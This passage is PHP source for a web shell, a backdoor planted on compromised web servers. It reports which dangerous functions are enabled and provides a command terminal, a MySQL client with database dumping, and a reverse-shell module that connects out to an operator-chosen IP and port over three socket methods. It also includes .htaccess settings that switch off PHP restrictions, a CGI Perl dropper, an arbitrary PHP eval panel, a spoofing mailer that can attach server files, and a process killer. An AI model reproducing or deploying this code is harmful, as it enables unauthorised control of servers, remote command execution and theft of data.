'runkit_function_rename' , 'set_time_limit' , 'sh2_exec' , 'shell_exec' , 'show_source' , 'sleep' , 'socket_accept' , 'socket_bind' ,
'socket_clear_error' , 'socket_close' , 'socket_connect' , 'socket_create' , 'socket_create_listen' , 'socket_create_pair' ,
'socket_get_option' , 'socket_getpeername' , 'socket_getsockname' , 'socket_last_error' , 'socket_listen' , 'socket_read' ,
'socket_recv' , 'socket_recvfrom' , 'socket_select' , 'socket_send' , 'socket_sendto' , 'socket_set_block' , 'socket_set_nonblock' ,
'socket_set_option' , 'socket_shutdown' , 'socket_strerror' , 'socket_write' , 'str_rot13' , 'stream_select' , 'stream_socket_server' ,
'symlink' , 'syslog' , 'system' , 'tp_exec' , 'virtual' , 'xmlrpc_entity_decode' );
sort ( $security );
$fucks = array_unique ( array_merge ( $disable_functions , $security ));
$table = " " ;
$enable = 0 ;
$disable = 0 ;
$die = array ();
$ready = array ();
$off = array ();
$total = count ( $fucks );
foreach ( $fucks as $fuck )
$table .= " <tr><td></td><td> $fuck </td><td> " ;
if ( in_array ( $fuck , $disable_functions ))
$table .= " <center><font color=red>DIE</font></center> " ;
$die [] = $fuck ;
$disable ++ ;
if ( function_exists ( $fuck ) || is_callable ( $fuck ))
$table .= " <center><font color=green>READY</font></center> " ;
$ready [] = $fuck ;
$enable ++ ;
$table .= " <center><font color=orange>OFF</font></center> " ;
$off [] = $fuck ;
$disable ++ ;
$table .= " </td></tr> " ;
$risk = ( $enable / $total ) * 100 ;
$secure = ( $disable / $total ) * 100 ;
printf ( " <h2 style='text-align:center'>Sec. Info v2.0.%s</h2><br>
< h4 style = 'text-align:center;color:var(--txt-color)' > Risks Rate < font color = red > [ % s %% ] </ font > | Secure Rate < font color = green > [ % s %% ] </ font ></ h4 >< br >< br >
< div class = 'auto-number' >
< table class = 'table sortable' >
< thead >
< tr >
< th class = 'sorttable_nosort' width = '15' > No .</ th >
< th > Disable Function </ th >
< th > Status </ th >
</ tr >
</ thead >
< tbody >
% s
</ tbody >
</ table >
< fieldset style = 'margin-bottom:15px' >
< legend > Ready List </ legend >
< textarea >% s </ textarea >
</ fieldset >
< div class = 'divide' >
< div class = 'divide-left' >
< fieldset style = 'margin-bottom:15px' >
< legend > Off List </ legend >
< textarea >% s </ textarea >
</ fieldset >
</ div >
< div class = 'divide-right' >
< fieldset >
< legend > Die List </ legend >
< textarea >% s </ textarea >
</ fieldset >
</ div >
</ div > " , $total ,round( $risk ,2),round( $secure ,2), $table ,implode( $ready , ', '),implode( $off , ', '),implode( $die , ', '));
if ( $_REQUEST [ 'x' ] == " info " )
printf ( " <div id='php-configuration'>
< form onsubmit = 'return false;' class = 'new' >
< select id = 'php-config' >
< option value = '4' > INFO_CONFIGURATION </ option >
< option value = '16' selected > INFO_ENVIRONMENT </ option >
< option value = '32' > INFO_VARIABLES </ option >
< option value = '8' > INFO_MODULES </ option >
< option value = '1' > INFO_GENERAL </ option >
< option value = '2' > INFO_CREDITS </ option >
< option value = '64' > INFO_LICENSE </ option >
< option value = '-1' > INFO_ALL </ option >
</ select >
< input type = 'submit' onclick = \ " return getAjax(true,'php-info','POST','?x=info&xa=envirolment&config='+document.getElementById('php-config').value); \" /><br>
</ form >
</ div >
< div id = 'php-info' class = 'result' ></ div > " );
$table = " " ;
foreach ( $cores as $core )
$table .= " <tr><td> " . $core . " </td><td> " .@ constant ( $core ) . " </td></tr> " ;
printf ( " <h2>Core Predefined Constants</h2><br>
< table class = 'table' >
< thead >
< tr >
< th > Predefined Constants </ th >
< th > Value </ th >
</ tr >
< tbody >% s </ tbody >
</ table > " , $table );
if ( any ( " xa " , $_REQUEST ) && $_REQUEST [ 'xa' ] == " envirolment " )
ob_clean ();
phpinfo ( $_REQUEST [ 'config' ]);
$phpinfo = ob_get_contents ();
ob_end_clean ();
$phpinfo = preg_replace ( '%^.*<body>(.*)</body>.*$%ms' , '$1' , $phpinfo );
printf ( " <div id='phpinfo'>%s</div> " , $phpinfo );
exit ;
if ( $_REQUEST [ 'x' ] == " db " )
$connect = any ( " connect " , $_SESSION ) ? $_SESSION [ 'connect' ] : " " ;
$status = any ( " status " , $_SESSION ) ? $_SESSION [ 'status' ] : " " ;
$query = any ( " query " , $_REQUEST ) ? $_REQUEST [ 'query' ] : " show databases; " ;
if ( $connect == true )
$process = " " ;
$sql = mysqli_connect ( $_SESSION [ 'host' ], $_SESSION [ 'user' ], $_SESSION [ 'pass' ], $_SESSION [ 'dbas' ], $_SESSION [ 'port' ]);
$result = mysql_list_processes ( $sql );
while ( $row = mysql_fetch_assoc ( $result ))
$process .= sprintf ( " <tr>
< td >% s </ td >< td >% s </ td >< td >% s </ td >
< td >% s </ td >< td >% s </ td ></ tr > " ,
$row [ " Id " ], $row [ " Host " ], $row [ " db " ],
$row [ " Command " ], $row [ " Time " ]);
mysql_free_result ( $result );
printf ( " <div class='database-session'>
< div class = 'database-query' >
< form action = '?x=db&xa=qry' method = 'post' >
< label > MYSQL Query < hr ></ label >< br >
< label >< i style = 'color:#222' >
show databases ; < br >
show tables from { database }; < br >
show columns from { database } . { table }; < br >
select count ( * ) from { database } . { table }; < br >
select * from { database } . { table } limit 0 , 10 ; </ i ></ label >
< textarea id = 'query' name = 'query' >% s </ textarea >< br >
< input type = 'submit' name = 'disconnect' value = 'Disconnect' />
< input type = 'submit' value = 'Execute' />
</ form >
</ div >
< div class = 'database-process' >
<!-- div class = 'mysql-process-result' >
< label > Database Process < a href = '?x=db&xa=proc' >& #9851;</a><hr></label>
< table class = 'table table-bordered' >
< thead >
< tr >
< th > Id </ th >
< th > Host </ th >
< th > Database </ th >
< th > Command </ th >
< th > Time </ th >
</ tr >
</ thead >
< tbody >% s </ tbody >
</ table >
</ div -->
< div class = 'database-dump' >
< label > Database Dump < hr ></ label >
< form action = '?x=db&xa=dmp' method = 'post' >< br >
< label > Database </ label >< input type = 'text' name = 'database' value = '' />< br >
< label > Output </ label >< input type = 'text' name = 'output' value = '%s' />< br >
< input type = 'submit' value = 'Dump' />
< label >% s </ label >
</ form >
</ div >
</ div >
< div class = 'clr' ></ div >
</ div >
" , $query , $process , $dir , $status );
printf ( " <div id='database'>
< form action = '?x=db&xa=db' method = 'post' class = 'new' >< br >
< label > Host </ label >< input type = 'text' name = 'host' value = 'localhost' />< br >
< label > Port </ label >< input type = 'text' name = 'port' value = '3306' />< br >
< label > Username </ label >< input type = 'text' name = 'user' value = 'root' />< br >
< label > Password </ label >< input type = 'text' name = 'pass' value = '' />< br >
< label > Database </ label >< input type = 'text' name = 'dbas' value = '' />< br >
< input type = 'submit' value = 'Connect' />
</ form >
</ div > " );
if ( any ( " rs " , $_REQUEST ))
$_SESSION [ $_REQUEST [ 'rs' ]] = '' ;
if ( any ( " cd " , $_REQUEST ))
$_SESSION [ 'qdb' ] = $_REQUEST [ 'cd' ];
if ( any ( " ct " , $_REQUEST ))
$_SESSION [ 'qtb' ] = $_REQUEST [ 'ct' ];
if ( any ( " xa " , $_REQUEST ) && $_REQUEST [ 'xa' ] == " db " )
$cn = mysqli_connect ( $_REQUEST [ 'host' ], $_REQUEST [ 'user' ], $_REQUEST [ 'pass' ], $_REQUEST [ 'dbas' ], $_REQUEST [ 'port' ]);
$_SESSION [ 'host' ] = $_REQUEST [ 'host' ];
$_SESSION [ 'port' ] = $_REQUEST [ 'port' ];
$_SESSION [ 'user' ] = $_REQUEST [ 'user' ];
$_SESSION [ 'pass' ] = $_REQUEST [ 'pass' ];
$_SESSION [ 'dbas' ] = $_REQUEST [ 'dbas' ];
if ( $cn )
$_SESSION [ 'connect' ] = true ;
header ( 'location:' . php_self . '?x=db' );
$_SESSION [ 'connect' ] = false ;
printf ( " <b class='off'>Connection Failed</b> " );
if ( any ( " xa " , $_REQUEST ) && $_REQUEST [ 'xa' ] == " qry " )
$_SESSION [ 'status' ] = '' ;
$con = mysqli_connect ( $_SESSION [ 'host' ], $_SESSION [ 'user' ], $_SESSION [ 'pass' ], $_SESSION [ 'dbas' ], $_SESSION [ 'port' ]);
if ( isset ( $_REQUEST [ 'disconnect' ]))
mysqli_close ( $con );
unset ( $_SESSION [ 'connect' ]);
unset ( $_SESSION [ 'query' ]);
unset ( $_SESSION [ 'host' ]);
unset ( $_SESSION [ 'user' ]);
unset ( $_SESSION [ 'pass' ]);
unset ( $_SESSION [ 'dbas' ]);
unset ( $_SESSION [ 'qdb' ]);
unset ( $_SESSION [ 'qtb' ]);
header ( 'location:' . php_self . '?x=db' );
$sql =! empty ( $_REQUEST [ 'query' ]) ? $_REQUEST [ 'query' ] : " show databases; " ;
$result = mysqli_query ( $con , $sql );
$data = array ();
$name = array ();
if ( $result )
while ( $fieldinfo = mysqli_fetch_field ( $result ))
$name [] = $fieldinfo -> name ;
$data [] = $name ;
while ( $row = mysqli_fetch_row ( $result ))
$data [] = $row ;
mysqli_free_result ( $result );
$data = false ;
if ( $data !== false )
$sqdb = isset ( $_SESSION [ 'qdb' ]) ? $_SESSION [ 'qdb' ] : '' ;
$sqtb = isset ( $_SESSION [ 'qtb' ]) ? $_SESSION [ 'qtb' ] : '' ;
$bsdb = " <a href='?x=db&xa=qry&rs=qdb&query=show databases;'>Database</a> " ;
$bqdb =! empty ( $_SESSION [ 'qdb' ]) ? " → <a href='?x=db&xa=qry&rs=qtb&query=show tables from $sqdb ;'> $sqdb </a> " : " " ;
$bqtb =! empty ( $_SESSION [ 'qtb' ]) ? " → <a href='?x=db&xa=qry&query=show columns from $sqdb . $sqtb ;'> $sqtb </a> " : " " ;
printf ( " <div class='database=table'>
< div class = 'database-breadcrumb' >% s % s % s </ div >
< div class = 'auto-number' >
< table class = 'table sortable' > " , $bsdb , $bqdb , $bqtb );
foreach ( $data as $key => $val )
if ( is_array ( $val ))
if ( $key == 0 )
print " <tr><th class='sorttable_nosort'>☰</th> " ;
foreach ( $val as $key2 => $val2 )
if ( ! is_array ( $val2 ))
print " <th> " . $val2 . " </th> " ;
print " </tr> " ;
print " <tr><td width='15'></td> " ;
foreach ( $val as $key3 => $val3 )
if ( ! is_array ( $val3 ))
if ( strpos ( $val2 , 'Database' ) !== false )
print " <td><a href='?x=db&xa=qry&cd= $val3 &query=show tables from $val3 ;'> $val3 </a></td> " ;
elseif ( strpos ( $val2 , 'Tables' ) !== false )
$val4 = substr ( $val2 , strpos ( $val2 , 'Tables_in_' ) + 10 );
print " <td><a href='?x=db&xa=qry&cd= $val4 &ct= $val3 &query=select * from $val4 . $val3 limit 0,10;'> $val3 </a></td> " ;
print " <td> $val3 </td> " ;
print " </tr> " ;
print " </table></div></div> " ;
print '<span class=off>Query not Executed</span>' ;
if ( any ( " xa " , $_REQUEST ) && $_REQUEST [ 'xa' ] == " dmp " )
$database = $_REQUEST [ 'database' ];
$output = $_REQUEST [ 'output' ];
if ( ! file_exists ( $output ) &&! empty ( $database ))
$link = mysqli_connect ( $_SESSION [ 'host' ], $_SESSION [ 'user' ], $_SESSION [ 'pass' ], null , $_SESSION [ 'port' ]);
mysqli_set_charset ( $link , 'utf8' );
mysqli_select_db ( $link , $database );
$tables = array ();
$result = mysqli_query ( $link , 'SHOW TABLES' );
while ( $row = mysqli_fetch_row ( $result ))
$tables [] = $row [ 0 ];
$return = 'SET FOREIGN_KEY_CHECKS=0;' . " \r \n " ;
$return .= 'SET SQL_MODE="NO_AUTO_VALUE_ON_ZERO";' . " \r \n " ;
$return .= 'SET AUTOCOMMIT=0;' . " \r \n " ;
$return .= 'START TRANSACTION;' . " \r \n " ;
foreach ( $tables as $table )
$result = mysqli_query ( $link , 'SELECT * FROM ' . $table );
$num_fields = mysqli_num_fields ( $result );
$num_rows = mysqli_num_rows ( $result );
$i_row = 0 ;
$row2 = mysqli_fetch_row ( mysqli_query ( $link , 'SHOW CREATE TABLE ' . $table ));
$return .= " \n \n " . $row2 [ 1 ] . " ; \n \n " ;
if ( $num_rows !== 0 ) {
$row3 =@ mysqli_fetch_fields ( $result );
$return .= 'INSERT INTO ' . $table . '( ' ;
foreach ( $row3 as $th )
$return .= '`' . $th -> name . '`,' ;
$return = substr ( $return , 0 , - 2 );
$return .= ' ) VALUES' ;
for ( $i = 0 ; $i < $num_fields ; $i ++ )
while ( $row = mysqli_fetch_row ( $result ))
$return .= " \n ( " ;
for ( $j = 0 ; $j < $num_fields ; $j ++ )
$row [ $j ] = addslashes ( $row [ $j ]);
$row [ $j ] = preg_replace ( " # \n # " , " \\ n " , $row [ $j ]);
if ( isset ( $row [ $j ])) { $return .= '"' . $row [ $j ] . '"' ;} else { $return .= '""' ;}
if ( $j < ( $num_fields - 1 )) { $return .= ',' ;}
if ( ++ $i_row == $num_rows ) {
$return .= " ); " ;
} else {
$return .= " ), " ;
$return .= " \n \n \n " ;
$return .= 'SET FOREIGN_KEY_CHECKS=1;' . " \r \n " ;
$return .= 'COMMIT;' ;
$output = pathinfo ( $otput )[ 'extension' ] == 'sql' ? $output : $output . '.sql' ;
$handle = fopen ( $output , 'w+' );
fwrite ( $handle , $return );
fclose ( $handle );
$_SESSION [ 'status' ] = sprintf ( " Dump with success... <a href='?a=v&r=%s' target='_blank'>'%s'</a> " , urle ( $output ), basename ( $output ));
$_SESSION [ 'status' ] = " <span class=off>Dump Error</span> " ;
header ( 'location:' . php_self . '?x=db' );
if ( $_REQUEST [ 'x' ] == " terminal " )
printf ( "
< div id = 'terminal' >
< textarea id = 'prompt-terminal' class = 'cmd' cols = '122' rows = '20' readonly >% s </ textarea >
< form onsubmit = 'return false;' >
< label id = 'curdir-terminal' > $ % s :</ label >
< input type = 'text' id = 'terminal-input' autocomplete = 'off' onfocus = \ " \" onkeydown= \"
if ( event . keyCode == 13 )
temp = this . value ;
this . value = '' ;
getAjax ( true , 'curdir-terminal' , 'POST' , '?x=terminal&xa=terminals-curdir&cmd=' + temp );
return getAjax ( false , 'prompt-terminal' , 'POST' , '?x=terminal&xa=terminals&cmd=' + temp );
\ " class='cmd' name=cmd cols=122 rows=2></input>
</ form >
</ div > " ,Execute('whoami'), $dir );
if ( any ( " xa " , $_REQUEST ) && $_REQUEST [ 'xa' ] == " terminals " )
ob_clean ();
$command =! empty ( $_REQUEST [ 'cmd' ]) ? $_REQUEST [ 'cmd' ] : " whoami " ;
@ chdir ( $dir );
$charset = 'UTF-8' ;
if ( ! Unix ())
$charset = 'Windows-1251' ;
$ret = iconv ( $charset , 'UTF-8' , Execute ( $command ));
print $ret ;
exit ;
elseif ( any ( " xa " , $_REQUEST ) && $_REQUEST [ 'xa' ] == " terminals-curdir " )
ob_clean ();
$command =! empty ( $_REQUEST [ 'cmd' ]) ? $_REQUEST [ 'cmd' ] : " whoami " ;
if ( preg_match ( '/cd (.*)/' , $command , $dirx ))
if ( $dirx [ 1 ] == '..' )
$dir = substr ( $dir , 0 , strrpos ( $dir , _ ));
if ( strlen ( $dir ) <= 2 ) $dir = $dir . _ ;
if ( is_dir ( $dirx [ 1 ]))
$dir = realpath ( $dirx [ 1 ]);
$_SESSION [ 'c' ] = urle ( $dir );
print '$ ' . $dir . ':' ;
exit ;
if ( $_REQUEST [ 'x' ] == " connect " )
printf ( " <div id='connect'>
< div class = 'connect-left' >
< div class = 'Reverse-connect' >
< fieldset >
< legend > Reverse Connect </ legend >
< form action = '?x=connect&xa=reverse-connect' method = 'post' onsubmit = \ "
return confirm ( 'HOST will FUCKED ON ur PC or LAPTOP ?!\\nMake Sure ur FIREWALL OFF ?!\\nUSE NETCAT {nc -lvp ' + document . getElementById ( 'reverse-port' ) . value + '}\\n\\nTYPE \'exit\' or \'quit\' to TERMINATE' ) \ " >
< label > Remote Ip </ label >< input type = 'text' name = 'reverse-ip' value = '%s' />< br >
< label > Remote Port </ label >< input type = 'text' id = 'reverse-port' name = 'reverse-port' value = '1337' />< br >
< label > Socket </ label >< select name = 'socket' >
< option value = 'fsockopen' > fsockopen </ option >
< option value = 'socket_create' > socket_create </ option >
< option value = 'stream_socket_client' > stream_socket_client </ option >
</ select >< br >
< input type = 'submit' value = 'Connect' />
</ form >
</ fieldset >
</ div >
</ div >
< div class = 'connect-right' >
< div class = 'status-connect' >
< fieldset >
< legend > Status </ legend >
< div id = 'connect-result' > Terminal : % s " ,
remote_addr , Execute ( 'whoami' )
if ( any ( " xa " , $_REQUEST ) && $_REQUEST [ 'xa' ] == " reverse-connect " )
if ( $_REQUEST [ 'socket' ] == " fsockopen " )
$host = $_REQUEST [ 'reverse-ip' ];
$port = $_REQUEST [ 'reverse-port' ];
$sock =@ fsockopen ( $host , $port , $errno , $errstr );
if ( $errno != 0 )
printf ( " <font color='red'><b>%s</b>:%s</font> " , $errno , $errstr );
while ( ! feof ( $sock ))
fwrite ( $sock , " [b4tm4n]: " );
$command = fgets ( $sock , 1024 );
if ( trim ( $command ) == 'quit' || trim ( $command ) == 'exit' )
fclose ( $sock );
printf ( $command );
exit ;
fwrite ( $sock , Execute ( $command ));
fclose ( $sock );
else if ( $_REQUEST [ 'socket' ] == " socket_create " )
$host = $_REQUEST [ 'reverse-ip' ];
$port = $_REQUEST [ 'reverse-port' ];
$sock = socket_create ( AF_INET , SOCK_STREAM , SOL_TCP );
socket_set_nonblock ( $sock );
if ( ! $sock )
printf ( " <font color='red'>Connection Error</font> " );
while ( !@ socket_connect ( $sock , $host , $port ))
@ socket_write ( $sock , " [b4tm4n]: " , strlen ( " [b4tm4n]: " ));
$input =@ socket_read ( $sock , 1024 , PHP_NORMAL_READ );
if ( trim ( $input ) == 'quit' || trim ( $input ) == 'exit' )
socket_set_block ( $sock );
socket_close ( $sock );
printf ( $input );
exit ;
@ socket_write ( $sock , Execute ( $input ), strlen ( Execute ( $input )));
socket_set_block ( $sock );
socket_close ( $sock );
else if ( $_REQUEST [ 'socket' ] == " stream_socket_client " )
$host = $_REQUEST [ 'reverse-ip' ];
$port = $_REQUEST [ 'reverse-port' ];
$sock =@ stream_socket_client ( " tcp:// $host : $port " , $errno , $errstr );
if ( ! $sock )
printf ( " <font color='red'><b>%s</b>:%s</font> " , $errno , $errstr );
while ( ! feof ( $sock ))
fwrite ( $sock , " [b4tm4n]: " );
$command = fgets ( $sock , 1024 );
if ( trim ( $command ) == 'quit' || trim ( $command ) == 'exit' )
fclose ( $sock );
printf ( $command );
exit ;
fwrite ( $sock , Execute ( $command ));
fclose ( $sock );
printf ( " </fieldset></div></div></div></div> " );
if ( $_REQUEST [ 'x' ] == " htaccess " )
$php_ini = array (
" php_value upload_max_filesize 32M " ,
" php_value post_max_size 32M " ,
" php_flag safe_mode Off " ,
" php_value disable_functions null " ,
" php_flag safe_mode_gid Off " ,
" php_value open_basedir $dir " ,
" php_flag register_globals On " ,
" php_flag exec On " ,
" php_flag shell_exec On " );
$htaccess = array (
" Options All " ,
" Allow From All " ,
" Satisfy Any " );
printf ( "
< div class = 'divide' >
< div class = 'divide-left' >
< textarea >% s </ textarea >
</ div >
< div class = 'divide-right' >
< textarea >% s </ textarea >
</ div >
</ div > " ,implode( $php_ini , " \n " ),implode( $htaccess , " \n " ));
if ( $_REQUEST [ 'x' ] == " php " )
$exp = array (
" print_r(get_extension_funcs('Core')); " ,
" print_r(get_loaded_extensions()); " ,
" print_r(ini_get_all('pcre')); " ,
" print_r(ini_get_all()); " ,
" print_r(get_defined_constants()); " ,
" print_r(get_defined_functions()); " ,
" print_r(get_declared_classes()); " );
printf ( " <div id='php'>
< form onsubmit = 'return false;' >
< div class = 'php-left' >
< textarea id = 'php-code' cols = '122' rows = '20' >% s </ textarea >
</ div >
< div class = 'php-right' >
< textarea id = 'php-eval' cols = '122' rows = '20' readonly ></ textarea >
</ div >
< input type = 'submit' id = 'php-submit' onclick = \ " getAjax(false,'php-eval','POST','?x=php&codex='+document.getElementById('php-code').value); \" class='php-code' name=php-code cols=122 rows=20 value='Inject'/>
< input type = 'submit' id = 'php-submit' onclick = \ " getAjax(false,'php-eval','POST','?x=php&code='+document.getElementById('php-code').value); \" class='php-code' name=php-code cols=122 rows=20 value='Run'/>
</ form >
</ div > " ,implode( $exp , " \n " ));
if ( any ( " code " , $_REQUEST ))
ob_clean ();
$code = trim ( $_REQUEST [ 'code' ]);
$evil = Evil ( $code );
exit ;
if ( any ( " codex " , $_REQUEST ))
ob_clean ();
$code = trim ( $_REQUEST [ 'codex' ]);
$evil = Evil ( $code , true );
exit ;
if ( $_REQUEST [ 'x' ] == " perl " )
print 'PHP Perl Class: ' . ( class_exists ( 'Perl' ) ? " <b class='on'>ON</b> " : " <b class='off'>OFF</b> " ) . '<br>' ;
if ( Unix ())
if ( file_exists ( " /usr/bin/perl " ))
$path_perl = " /usr/bin/perl " ;
$path_perl = " /usr/bin/env perl " ;
if ( file_exists ( " C: \\ perl \ bin \ perl.exe " ))
$path_perl = " C: \\ perl \ bin \ perl.exe " ;
elseif ( file_exists ( " C: \\ wamp \ bin \ perl.exe " ))
$path_perl = " C: \\ wamp \ bin \ perl.exe " ;
elseif ( file_exists ( " C: \\ xampp \ perl \ bin \ perl.exe " ))
$path_perl = " C: \\ xampp \ perl \ bin \ perl.exe " ;
$script = array (
" #! $path_perl " ,
" use strict; " ,
" use warnings; " ,
" use CGI; " ,
" print CGI::header(); " ,
" print 'k4mpr3t on CGI'; " );
$htaccess = array (
" Options +ExecCGI +SymLinksIfOwnerMatch " ,
" DirectoryIndex index.ler " ,
" AddType application/x-httpd-cgi .ler " ,
" AddHandler cgi-script .ler " );
$path = $dir . _ . 'cgi-bin' ;
$file = $path . _ . 'perl.ler' ;
$file2 = $path . _ . '.htaccess' ;
$scripts = implode ( $script , " \n " );
$htaccesss = implode ( $htaccess , " \n " );
if ( ! is_dir ( $path ))
mkdir ( $path , 0755 );
if ( ! is_file ( $file ))
$op = fopen ( $file , 'w+' );
fwrite ( $op , $scripts );
fclose ( $op );
chmod ( $file , 0755 );
if ( ! is_file ( $file2 ))
$op = fopen ( $file2 , 'w+' );
fwrite ( $op , $htaccesss );
fclose ( $op );
chmod ( $file2 , 0755 );
$redirect = GetUrlFromPath ( $file );
printf ( " Tested -> <a href=' $redirect ' target='_blank'><u>Link</u></a> " );
if ( class_exists ( 'Perl' ))
$perl = new Perl ();
$perl -> eval ( " print \" Executing Perl code in PHP \n \" " );
print " Hello from PHP! " ;
//$perl=new Perl();
$perl -> require ( $file );
$val = $perl -> somePhpFunc ( 'test' );
print $val ;
if ( $_REQUEST [ 'x' ] == " mail " )
printf ( "
< div class = 'divide' >
< div class = 'divide-left' >
< fieldset >
< legend > Mail </ legend >
< form onsubmit = 'return false;' class = 'mail' >
< label > From </ label >< input type = 'text' id = 'email-from' placeholder = 'Attacker <very@handsome.com>' value = 'Attacker <very@handsome.com>' />< br >
< label > Reply To </ label >< input type = 'text' id = 'email-reply' placeholder = very @ handsome . com ' value=' very @ handsome . com ' />< br >
< label > To </ label >< input type = 'text' id = 'email-to' placeholder = 'Target 1 <target1@target.com>,Target 2 <target2@target.com>' value = '' />< br >
< label > Cc </ label >< input type = 'text' id = 'email-cc' placeholder = 'target1@target.com,target2@target.com' value = '' />< br >
< label > Bcc </ label >< input type = 'text' id = 'email-bcc' placeholder = 'target1@target.com,target2@target.com' value = '' />< br >
< label > Subject </ label >< input type = 'text' id = 'email-subject' placeholder = 'What You Waiting For ?' value = '' />< br >
< label > Attachment ( FIlename ) </ label >< input type = 'text' id = 'email-attachment' placeholder = '%s' value = '' />< br >
< label > Messages </ label >< input type = 'text' id = 'email-message' />< br >
< input type = 'submit' value = 'Send' onclick = \ "
getAjax ( true ,
'send-result' ,
'POST' ,
'?x=mail&xa=send' +
'&from=' + document . getElementById ( 'email-from' ) . value +
'&reply=' + document . getElementById ( 'email-reply' ) . value +
'&to=' + document . getElementById ( 'email-to' ) . value +
'&cc=' + document . getElementById ( 'email-cc' ) . value +
'&bcc=' + document . getElementById ( 'email-bcc' ) . value +
'&subject=' + document . getElementById ( 'email-subject' ) . value +
'&message=' + document . getElementById ( 'email-message' ) . value +
'&attachment=' + document . getElementById ( 'email-attachment' ) . value );
\ " />
</ form >
</ fieldset >
</ div >
< div class = 'divide-right' >
< fieldset >
< legend > Result ' s </ legend >
< div id = 'send-result' ></ div >
</ fieldset >
</ div >
</ div >
" ,php_self);
if ( any ( 'xa' , $_REQUEST ) && $_REQUEST [ 'xa' ] == 'send' )
ob_clean ();
$from = $_REQUEST [ 'from' ];
$reply = $_REQUEST [ 'reply' ];
$to = $_REQUEST [ 'to' ];
$cc = $_REQUEST [ 'cc' ];
$bcc = $_REQUEST [ 'bcc' ];
$subject = $_REQUEST [ 'subject' ];
$msg = $_REQUEST [ 'message' ];
$attachment = $_REQUEST [ 'attachment' ];
$uid = md5 ( uniqid ( time ()));
$headers [] = " From: $from " ;
$headers [] = " Reply-To: $reply " ;
$headers [] = " To: $to " ;
if ( ! empty ( $cc )) $headers [] = 'Cc: $cc' ;
if ( ! empty ( $bcc )) $headers [] = 'Bcc: $bcc' ;
$headers [] = " MIME-Version: 1.0 " ;
$headers [] = " Content-Type: multipart/mixed; boundary= \" $uid\ " " ;
$messages [] = " -- $uid " ;
$messages [] = " Content-type: text/html; charset= \" iso-8859-1 \" " ;
$messages [] = " Content-Transfer-Encoding: 8bit " ;
$messages [] = " " ;
$messages [] = " $msg " ;
$messages [] = " " ;
if ( is_file ( $attachment ))
$content = file_get_contents ( $attachment );
$content = chunk_split ( B64E ( $content ));
$name = basename ( $attachment );
$mime = mime_content_type ( $attachment );
$messages [] = " -- $uid " ;
$messages [] = " Content-Type: $mime ; name= \" $name\ " " ;
$messages [] = " Content-Transfer-Encoding: base64 " ;
$messages [] = " Content-Disposition: attachment " ;
$messages [] = " " ;
$messages [] = " $content " ;
$messages [] = " " ;
$messages [] = " -- $uid -- " ;
$message = implode ( " \r \n " , $messages );
$header = implode ( " \r \n " , $headers );
if ( mail ( $to , $subject , $message , $header ))
print " Email Send " ;
$error = error_get_last ();
print " Error : " . $error [ 'message' ];
exit ;
if ( $_REQUEST [ 'x' ] == 'process' )
printf ( " <div id='process-kill'><form class='new' method='post' action='?x=process&xa=kill'>
< label > PID </ label > < input type = 'text' name = 'pid' />
< input type = 'submit' value = 'Kill' />< br >
< label > Name </ label > < input type = 'text' name = 'name' />
< input type = 'submit' value = 'Kill' />
</ form ></ div > " );
if ( any ( " xa " , $_REQUEST ) && $_REQUEST [ 'xa' ] == " kill " )
$pid = $_REQUEST [ 'pid' ];
$name = $_REQUEST [ 'name' ];
if ( Unix ())
$kill = Execute ( " kill 9 $pid " );
$kill = Execute ( " kill 9 $name " );
if ( $kill ) print '<font class="off">Process Killed</font>' ;
$kill = Execute ( " taskkill /f /pid $pid " );
$kill = Execute ( " taskkill /f /im $name " );
if ( $kill ) print '<font class="off">Process Killed</font>' ;
if ( Unix ())
$ret = iconv ( 'UTF-8' , 'UTF-8' , Execute ( 'ps aux' ));
print '<div id="process-list"><pre>' . $ret . '</pre></div>' ;
$ret = iconv ( 'Windows-1251' , 'UTF-8' , Execute ( 'tasklist' ));
print '<div id="process-list"><pre>' . $ret . '</pre></div>' ;
if ( $_REQUEST [ 'x' ] == 'shells' )
print " Coming Soon " ;
if ( $_REQUEST [ 'x' ] == 'symlink' )
print " Coming Soon " ;
if ( $_REQUEST [ 'x' ] == " account " )
printf ( " <div id='account'><form class='new' method='post' action='?x=account&xa=change'>
< label > Username </ label > < input type = 'text' name = 'change-username' autocomplete = 'off' value = '%s' /> < br >
< label > Password </ label > < input type = 'text' name = 'change-password' autocomplete = 'off' value = '' />< br >
< input type = 'submit' value = 'Change' onclick = \ " return confirm('Sure ?'); \" />
</ form ></ div > " ,B64D( $account[0] ));
if ( any ( " xa " , $_REQUEST ) && $_REQUEST [ 'xa' ] == " change " )
$filename = script_filename ;
$username = $_REQUEST [ 'change-password' ];
$password = $_REQUEST [ 'change-username' ];
if ( ! empty ( $username ) &&! empty ( $password ))
$user_from = $account [ 0 ];
$user_to = B64E ( $password );
$content = file_get_contents ( $filename );
$chunk = explode ( $user_from , $content );
$content = implode ( $user_to , $chunk );
$change = file_put_contents ( $filename , $content );
$pass_from = $account [ 1 ];
$pass_to = sha1 ( md5 ( $username ));
$content = file_get_contents ( $filename );
$chunk = explode ( $pass_from , $content );
$content = implode ( $pass_to , $chunk );
$change = file_put_contents ( $filename , $content );
if ( $change )
session_destroy ();
session_regenerate_id ();
header ( 'location:' . php_self );
printf ( " Error change account " );
printf ( " <b class='off'>Mistakes !</b> " );
if ( $_REQUEST [ 'x' ] == " action " )
$files = any ( 'chk' , $_REQUEST ) ? $_REQUEST [ 'chk' ] : array ();
$value = any ( 'action-value' , $_REQUEST ) ? $_REQUEST [ 'action-value' ] : $_REQUEST [ 'action-option' ];
$tmp = " " ;
$row = " " ;
$count_dirs = 0 ;
$count_files = 0 ;
foreach ( $files as $file )
if ( is_dir ( urld ( $file )))
$count_dirs ++ ;
if ( is_file ( urld ( $file )))
$count_files ++ ;
$row .= " <tr><td> " . urld ( $file ) . " </td></tr> " ;
$tmp .= urld ( $file ) . " , " ;
if ( count ( $files ) == 1 && $value == 'copy' )
header ( 'location:' . php_self . '?a=cp&r=' . $files [ 0 ]);
if ( count ( $files ) == 1 && $value == 'move' )
header ( 'location:' . php_self . '?a=mv&r=' . $files [ 0 ]);
if ( ! any ( 'xa' , $_REQUEST ) && $value == 'delete' )
printf ( " <h4>Dir's: [%s] File's: [%s]</h4>
< table class = 'table' >% s </ table >
< form class = 'new' method = 'post' action = '?x=action&xa=option' >
< input type = 'hidden' name = 'action-option' value = '%s' />
< input type = 'hidden' name = 'tmp' value = '%s' />
< input type = 'submit' value = 'Remove' />
</ form > " ,
$count_dirs ,
$count_files ,
$row ,
$value ,
$tmp );
if ( ! any ( 'xa' , $_REQUEST ) && $value != 'delete' )
printf ( " <h4>Dir's: [%s] File's: [%s]</h4>
